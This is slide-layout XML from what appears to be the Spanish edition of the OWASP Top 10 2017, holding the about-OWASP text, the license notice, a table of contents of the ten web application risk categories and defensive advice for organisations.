            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1149588" y="7222913"/>
              <a:ext cx="5549303" cy="818957"/>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105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="2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No importa que tan buena sea su revisión, no hará ninguna diferencia a menos que la comunique efectivamente. Construya confianza mostrando que comprende cómo funciona la aplicación. Describa claramente y sin jerga técnica como puede ser abusada e incluya un escenario de ataque para hacerlo real. Haga una estimación realista de qué tan difícil es descubrir una vulnerabilidad y explotarla, y que tan malo podría ser. Finalmente, distribuya los hallazgos.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152881" y="7214424"/>
              <a:ext cx="990000"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spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Comunicar los mensajes claramente</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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292532368"/>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y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Licencia</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="1600" b="1" kern="1200" noProof="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000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Este trabajo está licenciado bajo la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Licencia Internacional 4.0 de Creative Commons Attribution-ShareAlike</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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2154667"/>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s-AR" sz="1600" b="1" kern="1200" noProof="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Tabla</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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 de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" kern="1200" noProof="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Contenidos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s-AR"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9709451"/>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s-AR" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sobre</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 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El Proyecto Abierto de Seguridad en Aplicaciones Web (OWASP por sus siglas en inglés) es una comunidad abierta dedicada a permitir que las organizaciones desarrollen, adquieran y mantengan aplicaciones y APIs en las que se pueda confiar</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 OWASP, encontrará de forma abierta y gratuita</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Herramientas y estándares de seguridad en aplicaciones.</a:t>
                      </a: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Libros completos de revisiones de seguridad en aplicaciones, desarrollo de código fuente seguro y revisiones de seguridad en código fuente</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Presentaciones y </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videos</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Hojas de trucos</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en varios temas comunes.</a:t>
                      </a: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Controles de seguridad estándar y bibliotecas.</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Capítulos locales en todo el mundo</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Investigaciones de vanguardia.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="950" b="0" i="0" u="none" strike="noStrike"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Numerosas </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conferencias alrededor del mundo</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="100"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="90000" algn="l"/>
                        </a:tabLst>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Listas de correo</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Conozca más en: </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https://www.owasp.org</a:t>
                      </a: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s-AR"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Todas las herramientas de OWASP, documentos, videos, presentaciones y capítulos son gratuitos y abiertos a cualquier interesado en mejorar la seguridad en aplicaciones.</a:t>
                      </a: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Abogamos por resolver la seguridad en aplicaciones como un problema de personas, procesos y tecnología, ya que los enfoques más efectivos para la seguridad en aplicaciones requieren mejoras en todas estas áreas.</a:t>
                      </a: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es un nuevo tipo de organización. Nuestra libertad de presiones comerciales nos permite proveer información sobre seguridad en aplicaciones sin sesgos, práctica y rentable.</a:t>
                      </a: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no está afiliada con ninguna compañía de tecnología, aunque apoyamos el uso instruido de tecnologías de seguridad comercial. OWASP produce muchos tipos de materiales en una manera abierta y colaborativa.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-A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La Fundación OWASP es una entidad sin fines de lucro para asegurar el éxito a largo plazo del proyecto. Casi todos los asociados con OWASP son voluntarios, incluyendo la junta directiva de OWASP, comités globales, líderes de capítulos, los líderes y miembros de proyectos. Apoyamos la investigación innovadora sobre seguridad a través de becas e infraestructura</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s-AR"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Únase</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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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nosotros</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t>TOC</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titel 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Tabla de Contenidos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430849348"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1352600"/>
          <a:ext cx="3383280" cy="685355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Sobre</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OWASP………………………………</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1</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5905">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr"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Acerca</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 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2</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Introducción </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3</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Notas</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sobre</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la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versión </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4</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Riesgos en la Seguridad de las</a:t>
                      </a:r>
                      <a:b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Aplicaciones </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5</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b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-	OWASP Top 10 2017 </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="es-AR" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:b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0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Riesgos en Seguridad de Aplicaciones </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6</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Inyección ..….</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7</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Pérdida de Autenticación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8</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s-AR" sz="1000" noProof="0" dirty="0"/>
                        <a:t>Exposición de Datos Sensibles</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9</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Entidades Externas XML (XXE)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10</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Pérdida de Control de Acceso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11</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Configuración de Seguridad Incorrecta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12</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13</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Deserialización Insegura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14</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Uso de Componentes con </a:t>
                      </a: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Vulnerabilidades Conocidas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15</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Registro y Monitoreo Insuficientes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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16</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Próximos pasos para Desarrolladores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17</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Próximos pasos para Testers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18</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Próximos pasos para Organizaciones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19</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Próximos pasos para los Administradores </a:t>
                      </a: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 Aplicaciones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20</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Notas sobre los Riesgos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21</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Detalles acerca de los factores de</a:t>
                      </a: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Riesgo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22</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Metodología y Datos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23</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s-A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Agradecimientos …………………..……….</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-A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24</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR"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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 2" descr="by-sa.png">
            <a:hlinkClick r:id="rId35"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C95C1DA-8027-4B96-82E8-124407DEC119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="124618" y="9182410"/>
            <a:ext cx="1046163" cy="366027"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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292209710"/>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s-AR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Comience hoy su programa de seguridad en aplicaciones</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5000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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La seguridad en las aplicaciones ya no es opcional. Entre el aumento de los ataques y las presiones de cumplimiento normativo, las organizaciones deben establecer un mecanismo eficaz para asegurar sus aplicaciones y APIs. Dado el asombroso número de líneas de código que ya están en producción, muchas organizaciones luchan para conseguir gestionar un enorme volumen de vulnerabilidades.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="105000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pP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OWASP recomienda a las organizaciones establecer un programa para aumentar el conocimiento y mejorar la seguridad en todo su catálogo de aplicaciones y APIs. Conseguir un nivel de seguridad adecuado requiere que diversas partes de la organización trabajen juntos de manera eficiente, incluidos los departamentos de seguridad y auditoria, desarrollo, gestión y el negocio. Se requiere que la seguridad sea visible y medible, para que todos los involucrados puedan entender la postura de la organización en cuanto a la seguridad en aplicaciones. También es necesario centrarse en las actividades y resultados que realmente ayuden a mejorar la seguridad de la empresa mediante la reducción de riesgo de la forma más rentable posible. Algunas de las actividades clave en la efectiva aplicación de los programas de seguridad incluyen </a:t>
                      </a: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 </a:t>
                      </a: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y la </a:t>
                      </a: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Guía de OWASP de Seguridad para CISOs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" baseline="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10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s-AR" noProof="0" dirty="0"/>
              <a:t>+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="75600"/>
            <a:ext cx="5486400" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Próximos pasos para las Organizaciones</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Grupo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D4414C7-09AD-4BC7-A49C-C6354020E845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-914400" y="3598155"/>
            <a:ext cx="8686800" cy="6604000"/>
            <a:chOff x="-914400" y="3569580"/>
            <a:chExt cx="8686800" cy="6604000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectángulo 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1319639-649D-496D-B769-F56C8155B2ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-914400" y="3569580"/>
              <a:ext cx="8686800" cy="6604000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Forma libre: forma 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA8278DE-8495-4688-9F98-C0C6BD7FC800}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1148985" y="3569580"/>
              <a:ext cx="5559552" cy="1212653"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1170868"/>
                <a:gd name="connsiteY0" fmla="*/ 195149 h 5559552"/>
                <a:gd name="connsiteX1" fmla="*/ 195149 w 1170868"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX2" fmla="*/ 975719 w 1170868"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX3" fmla="*/ 1170868 w 1170868"/>
                <a:gd name="connsiteY3" fmla="*/ 195149 h 5559552"/>
                <a:gd name="connsiteX4" fmla="*/ 1170868 w 1170868"/>
                <a:gd name="connsiteY4" fmla="*/ 5364403 h 5559552"/>
                <a:gd name="connsiteX5" fmla="*/ 975719 w 1170868"/>
                <a:gd name="connsiteY5" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX6" fmla="*/ 195149 w 1170868"/>
                <a:gd name="connsiteY6" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1170868"/>
                <a:gd name="connsiteY7" fmla="*/ 5364403 h 5559552"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1170868"/>
                <a:gd name="connsiteY8" fmla="*/ 195149 h 555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868" h="5559552">
                  <a:moveTo>
                    <a:pt x="1129769" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1152467" y="0"/>
                    <a:pt x="1170868" y="414858"/>
                    <a:pt x="1170868" y="926613"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1170868" y="4632939"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1170868" y="5144694"/>
                    <a:pt x="1152467" y="5559552"/>
                    <a:pt x="1129769" y="5559552"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="41099" y="5559552"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18401" y="5559552"/>
                    <a:pt x="0" y="5144694"/>
                    <a:pt x="0" y="4632939"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="926613"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="414858"/>
                    <a:pt x="18401" y="0"/>
                    <a:pt x="41099" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1129769" y="0"/>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7157" tIns="129157" rIns="147157" bIns="129157" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="444500" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pP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Documentar todas las aplicaciones y sus activos de información asociados. Las organizaciones grandes deben considerar el uso de una </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6"/>
                </a:rPr>
                <a:t>Base de Datos de Gestión de la Configuración (CMDB).</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1" indent="-171450" algn="l" defTabSz="444500" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pP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Establecer un </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7"/>
                </a:rPr>
                <a:t>programa de seguridad de aplicaciones</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e impulsar su adopción.</a:t>
              </a:r>
              <a:endParaRPr lang="es-E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1" indent="-171450" algn="l" defTabSz="444500" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pP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Realizar un </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8"/>
                </a:rPr>
                <a:t>análisis de brecha de capacidades</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entre su organización y otras similares para definir las áreas clave de mejora y un plan de ejecución.</a:t>
              </a:r>
              <a:endParaRPr lang="es-E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1" indent="-171450" algn="l" defTabSz="444500" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="105000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="200"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pP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Obtener la aprobación de la dirección y establecer una </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9"/>
                </a:rPr>
                <a:t>campaña de concienciación de seguridad en las aplicaciones</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="es-AR"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para toda la organización y TI.</a:t>
              </a:r>
              <a:endParaRPr lang="es-E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7" name="Forma libre: forma 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F80DDAC-2DE0-49C4-A9C0-A51085C0A38C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="158400" y="3570556"/>
              <a:ext cx="990000" cy="1233983"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1011164"/>
                <a:gd name="connsiteY0" fmla="*/ 168531 h 1233983"/>
                <a:gd name="connsiteX1" fmla="*/ 168531 w 1011164"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1233983"/>
                <a:gd name="connsiteX2" fmla="*/ 842633 w 1011164"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1233983"/>
                <a:gd name="connsiteX3" fmla="*/ 1011164 w 1011164"/>
                <a:gd name="connsiteY3" fmla="*/ 168531 h 1233983"/>
                <a:gd name="connsiteX4" fmla="*/ 1011164 w 1011164"/>
                <a:gd name="connsiteY4" fmla="*/ 1065452 h 1233983"/>
                <a:gd name="connsiteX5" fmla="*/ 842633 w 1011164"/>
                <a:gd name="connsiteY5" fmla="*/ 1233983 h 1233983"/>
                <a:gd name="connsiteX6" fmla="*/ 168531 w 1011164"/>
                <a:gd name="connsiteY6" fmla="*/ 1233983 h 1233983"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1011164"/>
                <a:gd name="connsiteY7" fmla="*/ 1065452 h 1233983"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1011164"/>
                <a:gd name="connsiteY8" fmla="*/ 168531 h 123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164" h="1233983">
                  <a:moveTo>
                    <a:pt x="0" y="168531"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="75454"/>
                    <a:pt x="75454" y="0"/>
                    <a:pt x="168531" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="842633" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="935710" y="0"/>
                    <a:pt x="1011164" y="75454"/>
                    <a:pt x="1011164" y="168531"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1011164" y="1065452"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1011164" y="1158529"/>
                    <a:pt x="935710" y="1233983"/>
                    <a:pt x="842633" y="1233983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168531" y="1233983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="75454" y="1233983"/>
                    <a:pt x="0" y="1158529"/>
                    <a:pt x="0" y="1065452"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="16853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133357" tIns="114307" rIns="133357" bIns="114307" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="444500" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="es-AR" sz="1000" b="1" kern="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="dk1"/>
                  </a:solidFill>
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Inicio</a:t>
              </a:r>
              <a:endParaRPr lang="es-AR" sz="900" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>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0" name="Forma libre: forma 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B55216EA-692E-4DB0-A376-1EE98DEB4E96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1148985" y="4913532"/>
              <a:ext cx="5559553" cy="1211676"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1152365"/>
                <a:gd name="connsiteY0" fmla="*/ 192065 h 5559552"/>
                <a:gd name="connsiteX1" fmla="*/ 192065 w 1152365"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX2" fmla="*/ 960300 w 1152365"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 5559552"/>
                <a:gd name="connsiteX3" fmla="*/ 1152365 w 1152365"/>
                <a:gd name="connsiteY3" fmla="*/ 192065 h 5559552"/>
                <a:gd name="connsiteX4" fmla="*/ 1152365 w 1152365"/>
                <a:gd name="connsiteY4" fmla="*/ 5367487 h 5559552"/>
                <a:gd name="connsiteX5" fmla="*/ 960300 w 1152365"/>
                <a:gd name="connsiteY5" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX6" fmla="*/ 192065 w 1152365"/>
                <a:gd name="connsiteY6" fmla="*/ 5559552 h 5559552"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1152365"/>
                <a:gd name="connsiteY7" fmla="*/ 5367487 h 5559552"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1152365"/>
                <a:gd name="connsiteY8" fmla="*/ 192065 h 555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365" h="5559552">
                  <a:moveTo>
                    <a:pt x="1112554" y="2"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1134541" y="2"/>
                    <a:pt x="1152365" y="414858"/>
                    <a:pt x="1152365" y="926614"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1152365" y="4632938"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1152365" y="5144694"/>
                    <a:pt x="1134541" y="5559550"/>
                    <a:pt x="1112554" y="5559550"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="39811" y="5559550"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17824" y="5559550"/>
                    <a:pt x="0" y="5144694"/>
                    <a:pt x="0" y="4632938"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="926614"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="414858"/>
                    <a:pt x="17824" y="2"/>
                    <a:pt x="39811" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
